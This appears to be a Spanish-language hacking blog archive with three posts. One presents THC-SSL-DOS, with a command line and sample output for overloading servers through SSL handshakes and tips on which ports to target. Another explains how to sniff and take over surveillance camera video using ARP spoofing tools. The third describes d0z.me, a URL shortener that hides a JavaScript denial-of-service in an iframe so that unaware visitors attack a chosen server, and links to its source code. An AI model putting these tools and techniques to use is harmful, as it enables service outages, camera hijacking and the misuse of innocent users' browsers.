Mostrando entradas con la etiqueta dos. Mostrar todas las entradas
Mostrando entradas con la etiqueta dos. Mostrar todas las entradas

miércoles, 2 de noviembre de 2011

[DoS/DDoS] THC SSL Tool

THC-SSL-DOS es una herramienta para comprobar el rendimiento de las conexiones SSL. Establecer una conexion segura requiere 15 veces mas procesamiento en el servidor que en el cliente. Esta herramienta usa esa propiedad para sobrecargar el servidor y provocar que se caiga. Este problema afecta a todas las implementaciones de SSL.






Ejemplo de uso:

./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err
- Los servidores normalmente suelen hacer 300 handshakes por segundo. Esto requeriria 10-25% del CPU de un portatil.
- El puerto HTTPS (443) no es siempre el mejor para realizar los ataques. Prueba tambien con otros puertos y servicios como POP3S, SMTPS, ...

Descarga:

domingo, 30 de enero de 2011

[ARP Spoofing] Camaras de vigilancia y video vigilancia

Se trata de sniffear videos de sistemas de vieovigilancia y poder ver la camara web y tomar control sobre ella,poner otro video grabar lo que ve la cámara...

Para ello se usandos herramientas principalmente.

UCSniff:

http://ucsniff.sourceforge.net/
Uso de UCSniff:
http://ucsniff.sourceforge.net/usage.html



VideoJack:
http://sourceforge.net/projects/videojak/files/Videojak-2.0/videojak-2.0.tar.gz/download?use_mirror=ignum

Uso:
http://videojak.sourceforge.net/usage.html




Aquí un video de la DEFCON donde se habla y se trata en vivo esta técnica; está en inglés pero espero que os sirva.

[DoS] D0z.me - Url que genera ddos




D0z.me es un acortador de Url que tiene el siguiente funcionamiento:

Los atacantes van al sitio, ingresan un vínculo que quieran compartir y también introducen la dirección de un servidor que desean atacar también. Luego, comparten esta URL corta con tantas personas como sea posible y en tantos lugares como sea posible.

Cuando los usuarios hacen clic en el enlace corto, parecen ser redirigidos al contenido solicitado, pero en realidad están viendo la página en un iframe incrustado.

Mientras los usuarios están ocupados viendo la página, una denegación de servicio (a través de un Javascript malicioso). Si estos clientes siguen navegando por la página, se puede mantener la denegación de servicio en segundo plano todo el tiempo.

Codigo fuente : http://spareclockcycles.org/downloads/code/dosme.tar.gz

Sitio: http://d0z.me/